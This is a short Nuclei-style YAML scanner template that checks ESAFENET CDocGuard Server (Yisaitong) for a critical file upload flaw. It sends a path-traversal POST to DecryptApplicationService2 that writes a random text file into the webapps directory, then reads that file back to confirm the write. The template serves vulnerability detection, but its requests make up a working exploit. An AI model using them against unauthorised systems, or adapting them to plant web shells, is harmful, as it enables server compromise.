id: yisaitong-decryptapplicationService2-fileupload

info:
  name: yisaitong-decryptapplicationService2-fileupload
  author: msk
  severity: critical

    
variables:
  filename: '{{rand_base(4)}}'
  
http:
  - raw:
      - |
        POST /CDGServer3/DecryptApplicationService2?fileId=../../../Progra~2/ESAFENET/CDocGuard+Server/tomcat64/webapps/CDGServer3/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0

        {{randstr}}
      
      - |
        GET /CDGServer3/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0

    matchers:
      - type: dsl
        dsl:
          - "status_code_2 == 200 && contains((body_2), '{{randstr}}')"

